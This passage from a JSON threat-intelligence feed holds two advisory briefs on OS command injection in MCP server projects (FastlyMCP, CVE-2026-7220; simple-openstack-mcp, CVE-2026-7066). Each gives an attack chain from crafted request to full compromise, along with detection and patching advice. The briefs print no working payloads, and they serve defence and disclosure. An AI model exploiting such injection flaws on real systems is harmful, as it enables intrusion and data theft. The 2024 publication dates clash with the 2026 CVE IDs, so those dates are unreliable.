unavailable, increasing the difficulty of patching. This vulnerability poses a significant risk as it can lead to complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable instance of FastlyMCP running a version up to commit 6f3d0b0e654fc51076badc7fa16c03c461f95620.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003efastly-mcp.mjs\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes a manipulated \u003ccode\u003ecommand\u003c/code\u003e argument containing OS command injection payloads.\u003c/li\u003e\n\u003cli\u003eThe FastlyMCP application processes the request, passing the attacker-controlled \u003ccode\u003ecommand\u003c/code\u003e argument to an underlying OS command execution function without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected OS command is executed by the server with the privileges of the FastlyMCP application.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the server, enabling further malicious activities.\u003c/li\u003e\n\u003cli\u003eThe attacker may then establish persistence via web shells or by modifying system configurations.\u003c/li\u003e\n\u003cli\u003eUltimately, the attacker achieves complete control over the system, potentially leading to data theft, service disruption, or further lateral movement within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7220 allows attackers to execute arbitrary OS commands on the affected system. This can lead to full system compromise, potentially resulting in data breaches, service disruption, and lateral movement to other systems within the network. The lack of specific versioning information due to the rolling release model makes identifying and patching vulnerable instances challenging, potentially increasing the number of victims.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests targeting \u003ccode\u003efastly-mcp.mjs\u003c/code\u003e with unusual parameters in the query string to detect potential exploitation attempts (see the Sigma rule \u003ccode\u003eDetect FastlyMCP Command Injection Attempt\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization for the \u003ccode\u003ecommand\u003c/code\u003e argument in \u003ccode\u003efastly-mcp.mjs\u003c/code\u003e to prevent command injection, though patching is preferable.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Process Execution via FastlyMCP\u003c/code\u003e to identify potential malicious process execution originating from FastlyMCP.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-02-fastly-mcp-command-injection/","summary":"A command injection vulnerability (CVE-2026-7220) exists in jackwrichards FastlyMCP allowing remote attackers to execute arbitrary OS commands by manipulating the command argument in the fastly-mcp.mjs file.","title":"FastlyMCP Command Injection Vulnerability (CVE-2026-7220)","url":"https://feed.craftedsignal.io/briefs/2024-01-02-fastly-mcp-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-7066"}],"_cs_exploited":false,"_cs_products":["simple-openstack-mcp"],"_cs_severities":["high"],"_cs_tags":["command-injection","vulnerability","openstack"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical vulnerability, identified as CVE-2026-7066, has been discovered in choieastsea simple-openstack-mcp up to version 767b2f4a8154cca344344b9725537a58399e6036. This vulnerability resides within the \u003ccode\u003eexec_openstack\u003c/code\u003e function of the \u003ccode\u003eserver.py\u003c/code\u003e file. Due to insufficient input sanitization, a remote attacker can inject arbitrary OS commands. The exploit is publicly available, increasing the risk of exploitation. The vendor utilizes rolling releases, so specific affected versions are difficult to pinpoint. The project has been notified of the vulnerability but has not yet addressed it. This vulnerability poses a significant risk to systems running the affected software.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable instance of choieastsea simple-openstack-mcp running a version up to 767b2f4a8154cca344344b9725537a58399e6036.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003eserver.py\u003c/code\u003e endpoint responsible for handling \u003ccode\u003eexec_openstack\u003c/code\u003e function calls.\u003c/li\u003e\n\u003cli\u003eWithin the HTTP request, the attacker injects OS commands into a parameter that is processed by the \u003ccode\u003eexec_openstack\u003c/code\u003e function without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eserver.py\u003c/code\u003e script receives the crafted request and passes the attacker-controlled input directly to a shell interpreter, such as \u003ccode\u003eos.system()\u003c/code\u003e or \u003ccode\u003esubprocess.Popen()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed with the privileges of the user running the simple-openstack-mcp application.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the server, allowing them to perform actions such as installing malware, creating new user accounts, or accessing sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker may then use the compromised server as a pivot point to further compromise the internal network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7066 allows a remote attacker to execute arbitrary OS commands on the affected system. This can lead to full system compromise, data theft, and potential disruption of services. Given the nature of OpenStack environments, this could impact multiple virtual machines and cloud resources.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eExamine web server logs for requests targeting \u003ccode\u003eserver.py\u003c/code\u003e with unusual parameters or command-like syntax, which can indicate exploitation attempts. Implement the first Sigma rule provided.\u003c/li\u003e\n\u003cli\u003eDeploy the second Sigma rule to detect suspicious processes spawned by the web server that may be the result of command injection.\u003c/li\u003e\n\u003cli\u003eMonitor network connections originating from the server running simple-openstack-mcp for unusual outbound traffic to external IPs which might signal data exfiltration or C2 communication after a successful exploit using the third Sigma rule.\u003c/li\u003e\n\u003cli\u003eApply input validation and sanitization to the \u003ccode\u003eexec_openstack\u003c/code\u003e function within \u003ccode\u003eserver.py\u003c/code\u003e to prevent command injection.\u003c/li\u003e\n\u003cli\u003eWhile specific patch information is unavailable, closely monitor the choieastsea simple-openstack-mcp project for updates addressing CVE-2026-7066.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-simple-openstack-mcp-command-injection/","summary":"The choieastsea simple-openstack-mcp application is vulnerable to OS command injection via the exec_openstack function in server.py, allowing remote attackers to execute arbitrary commands.","title":"choieastsea simple-openstack-mcp OS Command Injection Vulnerability (CVE-2026-7066)","url":"https://feed.craftedsignal.io/briefs/2024-01-simple-openstack-mcp-command-injection/"}],"language":"en","title":"CraftedSignal Threat Feed — Command Injection","version":"https://jsonfeed.org/version/1.1"}